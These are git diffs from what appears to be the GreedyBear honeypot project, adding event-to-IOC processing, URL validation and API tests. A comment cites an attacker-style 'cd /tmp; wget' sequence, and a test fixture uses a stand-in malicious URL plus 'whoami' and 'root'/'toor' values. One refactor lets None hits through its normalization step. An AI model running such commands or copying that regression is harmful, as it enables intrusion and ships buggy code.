+        saved_ioc.save(update_fields=["related_urls"])
+        logger.debug(f"added {len(to_add)} related_url(s) → IOC {saved_ioc.name}")
+
+
+def _process_commands(ip_hits):
+    """
+    Deduplicates and registers order-preserving sequences of executed commands from raw hits.
+
+    Generates a unique SHA-256 hash representing the complete sequence to handle
+    idempotent generation of CommandSequence records.
+    """
+    # commands have semantic meaning in order ("cd /tmp; wget ...").
+    # A set would lose that. We deduplicate repeated identical lines
+    # while keeping the first occurrence in sequence.
+    seen: set[str] = set()
+    unique_commands: list[str] = []
+    for hit in ip_hits:
+        cmd = hit.get("_command")
+        if cmd and cmd.strip() and cmd not in seen:
+            seen.add(cmd)
+            unique_commands.append(cmd.strip())
+
+    if not unique_commands:
+        return
+
+    # CommandSequence.commands_hash is a unique constraint. The hash
+    # is the deduplication key, same commands = same hash = same row.
+    commands_hash = hashlib.sha256("|".join(unique_commands).encode()).hexdigest()
+    _, created = CommandSequence.objects.get_or_create(
+        commands_hash=commands_hash,
+        defaults={
+            "commands": unique_commands,
+            "first_seen": timezone.now(),
+            "last_seen": timezone.now(),
+        },
+    )
+    # the link goes through CowrieSession, which needs a valid hex
+    # session_id. RawEvent.session_id is free text (may be empty or
+    # non-hex). our discussion https://github.com/GreedyBear-Project/GreedyBear/discussions/1348
+    # marked session_id → None for now. The ClusterCommandSequences cronjob picks up all sequences in DB
+    # automatically,  no action needed from us.
+    if created:
+        logger.debug(f"created CommandSequence hash={commands_hash[:12]}…")
+
+
+def process_incoming_event(source_id, task_id):
+    """
+    Process a batch of RawEvents into IOCs.
+
+    Django-Q serializes task args into its DB. Passing N events
+    would bloat the queue. We pass only the batch_id and fetch fresh
+    from DB, faster queue, no serialization overhead.
+
+
+    All exceptions are caught and written to EventStatus.last_error.
+    The batch always ends in a terminal state (completed / failed).
+    The finally block guarantees the status is saved even on crash.
+    """
+    try:
+        batch = EventStatus.objects.get(task_id=task_id)
+    except EventStatus.DoesNotExist:
+        logger.exception(f"[batch={task_id}] EventStatus not found — aborting")
+        return
+
+    if batch.status in ["processing", "completed"]:
+        logger.warning(f"[task={task_id}] Batch already {batch.status} — skipping to avoid race condition")
+        return
+
+    batch.status = "processing"
+    batch.ioc_count = 0
+    batch.last_error = ""
+    batch.save(update_fields=["status", "ioc_count", "last_error"])
+    logger.info(f"[batch={task_id}] Started (source_id={source_id})")
+
+    processed_iocs = []
+
+    try:
+        # fetching RawEvents
+        raw_events = list(RawEvent.objects.filter(batch=batch, processed=False).select_related("sensor"))
+
+        if not raw_events:
+            logger.warning(f"[task_id={task_id}] No unprocessed RawEvents — completing")
+            batch.status = "completed"
+            batch.processed_at = timezone.now()
+            batch.save(update_fields=["status", "ioc_count", "processed_at"])
+            return
+
+        logger.info(f"[task={task_id}] {len(raw_events)} RawEvents fetched")
+
+        # normaizing hit dicts
+        hits = []
+        skipped = 0
+        for raw in raw_events:
+            hit = _normalize_raw_event_to_hit(raw)
+            if hit is not None:
+                hits.append(hit)
+            else:
+                skipped += 1
+
+        if skipped:
+            logger.warning(f"[task={task_id}] {skipped} RawEvent(s) skipped (bad data)")
+
+        if not hits:
+            error_msg = f"All {len(raw_events)} RawEvents invalid after normalization"
+            logger.error(f"[task={task_id}] {error_msg}")
+            batch.status = "failed"
+            batch.last_error = error_msg
+            return
+
+        logger.info(f"[task={task_id}] {len(hits)} valid hits")
+
+        ioc_objects = iocs_from_hits(hits)
+
+        if not ioc_objects:
+            error_msg = "iocs_from_hits returned 0 IOCs, all source IPs may be non-global or filtered"
+            logger.error(f"[task={task_id}] {error_msg}")
+            batch.status = "failed"
+            batch.last_error = error_msg
+            return
+
+        logger.info(f"[task_id={task_id}] {len(ioc_objects)} unique IOCs")
+
+        # grouping hits by src_ip for post-processing lookup
+        hits_by_ip: dict[str, list[dict]] = defaultdict(list)
+        for hit in hits:
+            hits_by_ip[hit["src_ip"]].append(hit)
+
+        # post processing
+        ioc_repo = IocRepository()
+        sensor_repo = SensorRepository()
+        processor = IocProcessor(ioc_repo, sensor_repo)
+
+        with transaction.atomic():
+            filtered = 0
+            for ioc in ioc_objects:
+                ip_hits = hits_by_ip.get(ioc.name, [])
+                attack_type = get_attack_type(ip_hits)
+                saved_ioc = processor.add_ioc(
+                    ioc,
+                    attack_type,
+                    # external sensors don't use Honeypot model
+                    honeypot_name=None,
+                )
+
+                if saved_ioc is None:
+                    logger.debug(f"[task={task_id}] {ioc.name} filtered by processor")
+                    filtered += 1
+                    continue
+
+                _process_credentials(saved_ioc, ip_hits)
+                _process_related_urls(saved_ioc, ip_hits)
+                _process_commands(ip_hits)
+
+                processed_iocs.append(saved_ioc)
+
+            if filtered:
+                logger.info(f"[task={task_id}] {filtered} IOC(s) filtered out")
+
+            logger.info(f"[task={task_id}] {len(processed_iocs)} IOC(s) persisted")
+
+            # score
+            if processed_iocs:
+                UpdateScores().score_only(processed_iocs)
+                logger.info(f"[task={task_id}] Scoring complete")
+
+            RawEvent.objects.filter(batch=batch, processed=False).update(processed=True)
+
+            batch.status = "completed"
+            batch.ioc_count = len(processed_iocs)
+
+    except Exception as exc:
+        logger.exception(f"[task={task_id}] Failed")
+        batch.status = "failed"
+        batch.last_error = str(exc)[:1000]
+
+    finally:
+        batch.processed_at = timezone.now()
+        batch.save(update_fields=["status", "ioc_count", "last_error", "processed_at"])
+        logger.info(f"[task={task_id}] Done — status={batch.status}, iocs={batch.ioc_count}")

--- a/greedybear/process_event.py
+++ b/greedybear/process_event.py
@@ -184,17 +184,7 @@ def process_incoming_event(source_id: int, task_id: str) -> None:
         logger.debug(f"[task={task_id}] {len(raw_events)} RawEvents fetched")
 
         # normaizing hit dicts
-        hits = []
-        skipped = 0
-        for raw in raw_events:
-            hit = _normalize_raw_event_to_hit(raw)
-            if hit is not None:
-                hits.append(hit)
-            else:
-                skipped += 1
-
-        if skipped:
-            logger.warning(f"[task={task_id}] {skipped} RawEvent(s) skipped (bad data)")
+        hits = [_normalize_raw_event_to_hit(raw) for raw in raw_events]
 
         if not hits:
             error_msg = f"All {len(raw_events)} RawEvents invalid after normalization"

--- a/greedybear/utils.py
+++ b/greedybear/utils.py
@@ -167,9 +167,6 @@ def is_valid_url(url):
         if not parsed.netloc:
             return False
 
-        if parsed.scheme in {"javascript", "data", "file"}:
-            return False
-
         if parsed.netloc.strip() == "":
             return False
 

--- a/greedybear/utils.py
+++ b/greedybear/utils.py
@@ -3,8 +3,9 @@
 import re
 from datetime import datetime
 from ipaddress import IPv4Address, IPv4Network, ip_address
+from urllib.parse import urlparse
 
-from greedybear.consts import DOMAIN, IP
+from greedybear.consts import DOMAIN, IP, PAYLOAD_REQUEST, SCANNER
 
 
 def is_ip_address(string: str) -> bool:
@@ -136,3 +137,43 @@ def get_ioc_type(ioc: str) -> str:
     """
     is_valid, _ = is_valid_ipv4(ioc)
     return IP if is_valid else DOMAIN
+
+
+def get_attack_type(ip_hits):
+    """
+    Determines the attack type based on the raw hits for a specific IP.
+
+    An IOC that has triggered at least one hit containing a valid
+    payload download URL is classified as a PAYLOAD_REQUEST attacker.
+    Everything else is classified as a SCANNER.
+    """
+    for hit in ip_hits:
+        url = hit.get("_related_url")
+        # Ensure the hit has a URL and that it passes our path validation rules
+        if url and is_valid_url(url):
+            return PAYLOAD_REQUEST
+
+    return SCANNER
+
+
+def is_valid_url(url):
+    allowed_schemes = {"http", "https"}
+    try:
+        parsed = urlparse(url)
+
+        if parsed.scheme not in allowed_schemes:
+            return False
+
+        if not parsed.netloc:
+            return False
+
+        if parsed.scheme in {"javascript", "data", "file"}:
+            return False
+
+        if parsed.netloc.strip() == "":
+            return False
+
+        return bool(parsed.path and parsed.path.strip("/") != "")
+
+    except Exception:
+        return False

--- a/greedybear/utils.py
+++ b/greedybear/utils.py
@@ -139,7 +139,7 @@ def get_ioc_type(ioc: str) -> str:
     return IP if is_valid else DOMAIN
 
 
-def get_attack_type(ip_hits):
+def get_attack_type(ip_hits: list[dict]) -> str:
     """
     Determines the attack type based on the raw hits for a specific IP.
 
@@ -156,7 +156,7 @@ def get_attack_type(ip_hits):
     return SCANNER
 
 
-def is_valid_url(url):
+def is_valid_url(url: str | None) -> bool:
     allowed_schemes = {"http", "https"}
     try:
         parsed = urlparse(url)

--- a/tests/__init__.py
+++ b/tests/__init__.py
@@ -9,12 +9,15 @@ from django_test_migrations.migrator import Migrator
 from greedybear.enums import IpReputation
 from greedybear.models import (
     IOC,
+    APISource,
     AutonomousSystem,
     CommandSequence,
     CowrieSession,
     Credential,
     Honeypot,
     IocType,
+    Sensor,
+    SourceType,
 )
 
 
@@ -332,3 +335,30 @@ class E2ETestCase(ExtractionTestCase):
             from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
 
             return ExtractionPipeline()
+
+
+# shared helper fx
+def make_user(username="testuser", password="pass1234!"):
+    return User.objects.create_user(username=username, password=password)
+
+
+def make_api_source(user, name="TestSource"):
+    return APISource.objects.create(user=user, name=name)
+
+
+def make_sensor(api_source, address="192.168.1.100", label="sensor-a", **kwargs):
+    """
+    Helper to create a Sensor for testing.
+    """
+    defaults = {
+        "label": label,
+        "source_type": SourceType.EXTERNAL,
+    }
+    defaults.update(kwargs)
+
+    sensor, _ = Sensor.objects.get_or_create(
+        address=address,
+        api_source=api_source,
+        defaults=defaults,
+    )
+    return sensor

--- a/tests/api/views/test_event.py
+++ b/tests/api/views/test_event.py
@@ -5,13 +5,13 @@ from django.utils import timezone
 from rest_framework import status
 from rest_framework.test import APIClient
 
-from greedybear.models import EventStatus, RawEvent
+from greedybear.models import EventStatus, EventStatusType, RawEvent
 from tests import CustomTestCase, make_api_source, make_sensor, make_user
 
 User = get_user_model()
 
-EVENTS_URL = "/api/events/"
-STATUS_URL = "/api/event/{task_id}/status/"
+EVENTS_URL = "/api/events/add/"
+STATUS_URL = "/api/events/status/{task_id}/"
 
 
 def auth_client(user):
@@ -175,7 +175,7 @@ class TestEventsCreateSuccess(BaseEventTestCase):
 
         # Verify that the status_url contains the correct lookup identifier returned in the response
         expected_task_id = res.data["task_id"]
-        self.assertIn(f"/api/event/{expected_task_id}/status/", res.data["status_url"])
+        self.assertIn(f"/api/events/status/{expected_task_id}/", res.data["status_url"])
         mock_task.assert_called_once()
 
     @patch("api.views.event.async_task", return_value="task-multi")
@@ -251,12 +251,6 @@ class TestEventsCreateSuccess(BaseEventTestCase):
 
         self.assertEqual(res.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
 
-    @patch("api.views.event.async_task", side_effect=Exception("Queue down"))
-    def test_async_task_failure_still_returns_response(self, mock_task):
-        payload = {"events": [valid_event(self.sensor.id)]}
-        with self.assertRaises(Exception):  # noqa: B017
-            self.client.post(EVENTS_URL, payload, format="json")
-
 
 class TestEventsCreateAllInvalidSensors(BaseEventTestCase):
     @patch("api.views.event.async_task")
@@ -265,19 +259,20 @@ class TestEventsCreateAllInvalidSensors(BaseEventTestCase):
         event = valid_event(sensor_id=999999)
         res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
         self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
-        self.assertIn("No valid events", res.data["error"])
+        self.assertIn("Invalid or missing sensor_id", res.data["error"])
         # background task must NOT be dispatched
         mock_task.assert_not_called()
 
     @patch("api.views.event.async_task", return_value="task-partial")
-    def test_mixed_valid_and_invalid_sensors_stores_valid_only(self, mock_task):
-        """One valid sensor + one ghost sensor → only the valid event is stored."""
+    def test_mixed_valid_and_invalid_sensors_stores_none(self, mock_task):
+        """One valid sensor + one ghost sensor → entire batch rejected with 400."""
         good = valid_event(self.sensor.id)
         bad = valid_event(sensor_id=999999)
         res = self.client.post(EVENTS_URL, {"events": [good, bad]}, format="json")
-        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
-        task_id = res.data["task_id"]
-        self.assertEqual(RawEvent.objects.filter(batch__task_id=task_id).count(), 1)
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+        self.assertIn("Invalid or missing sensor_id", res.data["error"])
+        self.assertEqual(RawEvent.objects.count(), 0)
+        mock_task.assert_not_called()
 
 
 class TestEventStatusView(BaseEventTestCase):
@@ -374,3 +369,24 @@ class TestEventStatusView(BaseEventTestCase):
 
         res = self.client.get(STATUS_URL.format(task_id="task-flow"))
         self.assertEqual(res.data["status"], "processing")
+
+    @patch("api.views.event.async_task")
+    def test_events_create_fails_when_background_queue_crashing(self, mock_async_task):
+        """
+        If the message broker or async_task dispatcher throws an exception,
+        the API must catch it, transition the batch status to FAILED with the traceback,
+        and return a 500 Internal Server Error instead of staying stuck in PENDING.
+        """
+        mock_async_task.side_effect = Exception("Connection refused by Redis broker")
+
+        payload = {"events": [valid_event(self.sensor.id)]}
+
+        res = self.client.post(EVENTS_URL, payload, format="json")
+
+        self.assertEqual(res.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
+        self.assertIn("An internal error occurred while queueing events", res.data["error"])
+
+        batch = EventStatus.objects.get(api_source=self.api_source)
+        self.assertEqual(batch.status, EventStatusType.FAILED)
+        self.assertIn("Background task dispatch failed", batch.last_error)
+        self.assertIn("Connection refused by Redis broker", batch.last_error)

--- a/tests/api/views/test_event.py
+++ b/tests/api/views/test_event.py
@@ -1,0 +1,376 @@
+from unittest.mock import patch
+
+from django.contrib.auth import get_user_model
+from django.utils import timezone
+from rest_framework import status
+from rest_framework.test import APIClient
+
+from greedybear.models import EventStatus, RawEvent
+from tests import CustomTestCase, make_api_source, make_sensor, make_user
+
+User = get_user_model()
+
+EVENTS_URL = "/api/events/"
+STATUS_URL = "/api/event/{task_id}/status/"
+
+
+def auth_client(user):
+    client = APIClient()
+    client.force_authenticate(user=user)
+    return client
+
+
+def valid_event(sensor_id, **overrides):
+    base = {
+        "src_ip": "1.2.3.4",
+        "event_type": "login_attempt",
+        "timestamp": (timezone.now() - timezone.timedelta(seconds=10)).isoformat(),
+        "sensor_id": sensor_id,
+    }
+    base.update(overrides)
+    return base
+
+
+class BaseEventTestCase(CustomTestCase):
+    def setUp(self):
+        self.user = make_user()
+        self.api_source = make_api_source(self.user)
+        self.sensor = make_sensor(api_source=self.api_source)
+        self.client = auth_client(self.user)
+
+
+class TestEventsCreateAuth(BaseEventTestCase):
+    def test_unauthenticated_returns_401(self):
+        anon = APIClient()
+        res = anon.post(EVENTS_URL, {"events": []}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
+
+    def test_no_api_source_returns_403(self):
+        user2 = make_user(username="noapi")
+        client2 = auth_client(user2)
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = client2.post(EVENTS_URL, payload, format="json")
+        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
+        self.assertIn("APISource", res.data["error"])
+
+    def test_locked_api_source_returns_403(self):
+        self.api_source.is_active = False
+        self.api_source.save()
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = self.client.post(EVENTS_URL, payload, format="json")
+        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
+        self.assertIn("locked", res.data["error"])
+
+
+class TestEventsCreateValidation(BaseEventTestCase):
+    def test_empty_events_list_returns_400(self):
+        res = self.client.post(EVENTS_URL, {"events": []}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_missing_events_key_returns_400(self):
+        res = self.client.post(EVENTS_URL, {}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_missing_required_src_ip_returns_400(self):
+        event = valid_event(self.sensor.id)
+        del event["src_ip"]
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+        self.assertIn("src_ip", str(res.data))
+
+    def test_missing_required_event_type_returns_400(self):
+        event = valid_event(self.sensor.id)
+        del event["event_type"]
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_missing_required_timestamp_returns_400(self):
+        event = valid_event(self.sensor.id)
+        del event["timestamp"]
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_missing_required_sensor_id_returns_400(self):
+        event = valid_event(self.sensor.id)
+        del event["sensor_id"]
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_invalid_ip_returns_400(self):
+        event = valid_event(self.sensor.id, src_ip="not-an-ip")
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_future_timestamp_returns_400(self):
+        future_ts = (timezone.now() + timezone.timedelta(hours=1)).isoformat()
+        event = valid_event(self.sensor.id, timestamp=future_ts)
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+        self.assertIn("future", str(res.data).lower())
+
+    def test_src_port_out_of_range_returns_400(self):
+        event = valid_event(self.sensor.id, src_port=99999)
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_dest_port_out_of_range_returns_400(self):
+        event = valid_event(self.sensor.id, dest_port=0)
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_invalid_event_count_incremented_on_bad_payload(self):
+        before = self.api_source.invalid_event_count
+        event = valid_event(self.sensor.id, src_ip="bad-ip")
+        self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.api_source.refresh_from_db()
+        self.assertEqual(self.api_source.invalid_event_count, before + 1)
+
+    def test_exceeding_max_batch_size_returns_400(self):
+        # Sending 10 001 events should fail InjectionSerializer's max_length
+        events = [valid_event(self.sensor.id) for _ in range(10_001)]
+        res = self.client.post(EVENTS_URL, {"events": events}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_events_root_must_be_dict(self):
+        res = self.client.post(EVENTS_URL, [], format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+    def test_timestamp_now_is_accepted(self):
+        now_ts = timezone.now().isoformat()
+        event = valid_event(self.sensor.id, timestamp=now_ts)
+
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+
+    def test_sensor_from_other_api_source_is_rejected(self):
+        other_user = make_user(username="other2")
+        other_api = make_api_source(other_user, name="OtherUniqueSource")
+        other_sensor = make_sensor(api_source=other_api)
+
+        event = valid_event(other_sensor.id)
+
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+
+
+class TestEventsCreateSuccess(BaseEventTestCase):
+    @patch("api.views.event.async_task", return_value="task-abc-123")
+    def test_single_valid_event_returns_202(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = self.client.post(EVENTS_URL, payload, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+
+    @patch("api.views.event.async_task", return_value="task-abc-123")
+    def test_response_contains_required_fields(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = self.client.post(EVENTS_URL, payload, format="json")
+        for key in ("message", "task_id", "status_url"):
+            self.assertIn(key, res.data)
+
+    @patch("api.views.event.async_task", return_value="task-xyz")
+    def test_status_url_contains_task_id(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = self.client.post(EVENTS_URL, payload, format="json")
+
+        # Verify that the status_url contains the correct lookup identifier returned in the response
+        expected_task_id = res.data["task_id"]
+        self.assertIn(f"/api/event/{expected_task_id}/status/", res.data["status_url"])
+        mock_task.assert_called_once()
+
+    @patch("api.views.event.async_task", return_value="task-multi")
+    def test_multiple_valid_events_accepted(self, mock_task):
+        events = [valid_event(self.sensor.id) for _ in range(5)]
+        res = self.client.post(EVENTS_URL, {"events": events}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+        self.assertIn("5", res.data["message"])
+
+    @patch("api.views.event.async_task", return_value="task-db")
+    def test_raw_events_persisted_in_db(self, mock_task):
+        events = [valid_event(self.sensor.id) for _ in range(3)]
+        res = self.client.post(EVENTS_URL, {"events": events}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+        task_id = res.data["task_id"]
+        self.assertEqual(RawEvent.objects.filter(batch__task_id=task_id).count(), 3)
+
+    @patch("api.views.event.async_task", return_value="task-batchstatus")
+    def test_event_status_created_with_pending(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+        res = self.client.post(EVENTS_URL, payload, format="json")
+
+        batch = EventStatus.objects.get(task_id=res.data["task_id"])
+
+        self.assertEqual(batch.task_id, res.data["task_id"])
+        mock_task.assert_called_once()
+
+    @patch("api.views.event.async_task", return_value="task-optional")
+    def test_optional_fields_accepted(self, mock_task):
+        event = valid_event(
+            self.sensor.id,
+            session_id="sess-1",
+            token_id="tok-1",
+            protocol="tcp",
+            service_name="ssh",
+            username="root",
+            password="toor",
+            cve_id="CVE-2024-0001",
+            command="whoami",
+            src_port=4444,
+            dest_port=22,
+            related_url="http://evil.example.com/malware",
+            payload_hash="a" * 64,
+            data={"extra": "info"},
+        )
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+
+    @patch("api.views.event.async_task", return_value="task-ipv6")
+    def test_ipv6_src_ip_accepted(self, mock_task):
+        event = valid_event(self.sensor.id, src_ip="2001:db8::1")
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+
+    @patch("api.views.event.async_task", return_value="task-dup")
+    def test_duplicate_requests_create_separate_batches(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+
+        res1 = self.client.post(EVENTS_URL, payload, format="json")
+        res2 = self.client.post(EVENTS_URL, payload, format="json")
+
+        self.assertEqual(res1.status_code, status.HTTP_202_ACCEPTED)
+        self.assertEqual(res2.status_code, status.HTTP_202_ACCEPTED)
+
+        self.assertNotEqual(res1.data["task_id"], res2.data["task_id"])
+        self.assertEqual(mock_task.call_count, 2)
+
+    @patch("api.views.event.create_batch_and_events", side_effect=Exception("DB crash"))
+    def test_batch_creation_failure_returns_500(self, mock_create):
+        payload = {"events": [valid_event(self.sensor.id)]}
+
+        res = self.client.post(EVENTS_URL, payload, format="json")
+
+        self.assertEqual(res.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
+
+    @patch("api.views.event.async_task", side_effect=Exception("Queue down"))
+    def test_async_task_failure_still_returns_response(self, mock_task):
+        payload = {"events": [valid_event(self.sensor.id)]}
+        with self.assertRaises(Exception):  # noqa: B017
+            self.client.post(EVENTS_URL, payload, format="json")
+
+
+class TestEventsCreateAllInvalidSensors(BaseEventTestCase):
+    @patch("api.views.event.async_task")
+    def test_nonexistent_sensor_ids_return_400(self, mock_task):
+        """All events reference a sensor that does not exist → 0 rows created → 400."""
+        event = valid_event(sensor_id=999999)
+        res = self.client.post(EVENTS_URL, {"events": [event]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
+        self.assertIn("No valid events", res.data["error"])
+        # background task must NOT be dispatched
+        mock_task.assert_not_called()
+
+    @patch("api.views.event.async_task", return_value="task-partial")
+    def test_mixed_valid_and_invalid_sensors_stores_valid_only(self, mock_task):
+        """One valid sensor + one ghost sensor → only the valid event is stored."""
+        good = valid_event(self.sensor.id)
+        bad = valid_event(sensor_id=999999)
+        res = self.client.post(EVENTS_URL, {"events": [good, bad]}, format="json")
+        self.assertEqual(res.status_code, status.HTTP_202_ACCEPTED)
+        task_id = res.data["task_id"]
+        self.assertEqual(RawEvent.objects.filter(batch__task_id=task_id).count(), 1)
+
+
+class TestEventStatusView(BaseEventTestCase):
+    def _make_batch(self, task_id="task-status-1", batch_status="pending"):
+        return EventStatus.objects.create(
+            api_source=self.api_source,
+            task_id=task_id,
+            status=batch_status,
+        )
+
+    def test_unauthenticated_returns_401(self):
+        anon = APIClient()
+        res = anon.get(STATUS_URL.format(task_id="whatever"))
+        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
+
+    def test_no_api_source_returns_403(self):
+        user2 = make_user(username="noapi2")
+        client2 = auth_client(user2)
+        res = client2.get(STATUS_URL.format(task_id="whatever"))
+        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
+
+    def test_unknown_task_id_returns_404(self):
+        res = self.client.get(STATUS_URL.format(task_id="does-not-exist"))
+        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
+
+    def test_batch_belonging_to_other_user_returns_404(self):
+        """Users must not be able to see other users' batches."""
+        user2 = make_user(username="other")
+        api_source2 = make_api_source(user2, name="OtherSource")
+        EventStatus.objects.create(
+            api_source=api_source2,
+            task_id="task-other",
+            status="pending",
+        )
+        res = self.client.get(STATUS_URL.format(task_id="task-other"))
+        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)
+
+    def test_valid_task_id_returns_200(self):
+        self._make_batch()
+        res = self.client.get(STATUS_URL.format(task_id="task-status-1"))
+        self.assertEqual(res.status_code, status.HTTP_200_OK)
+
+    def test_response_contains_required_fields(self):
+        self._make_batch()
+        res = self.client.get(STATUS_URL.format(task_id="task-status-1"))
+        for key in ("task_id", "batch_id", "status", "ioc_count", "last_error", "processed_at", "created_at"):
+            self.assertIn(key, res.data)
+
+    def test_status_pending_reflected(self):
+        self._make_batch(batch_status="pending")
+        res = self.client.get(STATUS_URL.format(task_id="task-status-1"))
+        self.assertEqual(res.data["status"], "pending")
+
+    def test_status_completed_reflected(self):
+        self._make_batch(task_id="task-done", batch_status="completed")
+        res = self.client.get(STATUS_URL.format(task_id="task-done"))
+        self.assertEqual(res.data["status"], "completed")
+
+    def test_status_failed_with_error_message(self):
+        batch = self._make_batch(task_id="task-fail", batch_status="failed")
+        batch.last_error = "Something went wrong"
+        batch.save(update_fields=["last_error"])
+        res = self.client.get(STATUS_URL.format(task_id="task-fail"))
+        self.assertEqual(res.data["status"], "failed")
+        self.assertEqual(res.data["last_error"], "Something went wrong")
+
+    def test_null_last_error_returned_as_none(self):
+        batch = self._make_batch(task_id="task-noerror")
+        batch.last_error = ""
+        batch.save()
+        res = self.client.get(STATUS_URL.format(task_id="task-noerror"))
+        self.assertIsNone(res.data["last_error"])
+
+    def test_ioc_count_returned(self):
+        batch = self._make_batch(task_id="task-ioc")
+        batch.ioc_count = 42
+        batch.save(update_fields=["ioc_count"])
+        res = self.client.get(STATUS_URL.format(task_id="task-ioc"))
+        self.assertEqual(res.data["ioc_count"], 42)
+
+    def test_locked_api_source_returns_403_on_status(self):
+        self._make_batch()
+        self.api_source.is_active = False
+        self.api_source.save()
+        res = self.client.get(STATUS_URL.format(task_id="task-status-1"))
+        # locked source should still return 403 to be consistent with create view
+        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
+
+    def test_status_changes_over_time(self):
+        batch = self._make_batch(task_id="task-flow", batch_status="pending")
+
+        batch.status = "processing"
+        batch.save()
+
+        res = self.client.get(STATUS_URL.format(task_id="task-flow"))
+        self.assertEqual(res.data["status"], "processing")

--- a/tests/api/views/test_event.py
+++ b/tests/api/views/test_event.py
@@ -251,6 +251,32 @@ class TestEventsCreateSuccess(BaseEventTestCase):
 
         self.assertEqual(res.status_code, status.HTTP_500_INTERNAL_SERVER_ERROR)
 
+    @patch("api.views.event.async_task")
+    def test_events_create_all_invalid_sensors_locks_api_source_after_10_failures(self, mock_task):
+        """
+        Verifies that if an APISource reaches 10 failed batch insertion
+        attempts due to invalid sensor data, it is automatically deactivated (locked).
+        """
+        # Set the current count to 9 (so the next failure hits the 10 threshold)
+        self.api_source.invalid_event_count = 9
+        self.api_source.save()
+
+        # Send a payload containing a non-existent sensor ID
+        bad_event = valid_event(sensor_id=999999)
+        res = self.client.post(EVENTS_URL, {"events": [bad_event]}, format="json")
+
+        # The 10th failure must return a 403 Forbidden instead of a 400 Bad Request
+        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
+        self.assertIn("automatically locked", res.data["error"])
+
+        # Reload from the database to confirm it is locked
+        self.api_source.refresh_from_db()
+        self.assertFalse(self.api_source.is_active)
+        self.assertEqual(self.api_source.invalid_event_count, 10)
+
+        # Ensure background execution was never triggered
+        mock_task.assert_not_called()
+
 
 class TestEventsCreateAllInvalidSensors(BaseEventTestCase):
     @patch("api.views.event.async_task")

--- a/tests/greedybear/test_process_event.py
+++ b/tests/greedybear/test_process_event.py
@@ -1,0 +1,559 @@
+import hashlib
+from unittest.mock import MagicMock, patch
+
+from django.contrib.auth import get_user_model
+from django.utils import timezone
+
+from greedybear.models import (
+    IOC,
+    CommandSequence,
+    Credential,
+    EventStatus,
+    RawEvent,
+)
+from greedybear.process_event import (
+    _normalize_raw_event_to_hit,
+    _process_commands,
+    _process_credentials,
+    _process_related_urls,
+    process_incoming_event,
+)
+from tests import CustomTestCase, make_api_source, make_sensor, make_user
+
+User = get_user_model()
+
+
+PATCH_IOCS_FROM_HITS = "greedybear.process_event.iocs_from_hits"
+PATCH_IOC_PROCESSOR = "greedybear.process_event.IocProcessor"
+PATCH_UPDATE_SCORES = "greedybear.process_event.UpdateScores"
+PATCH_GET_ATTACK_TYPE = "greedybear.process_event.get_attack_type"
+
+
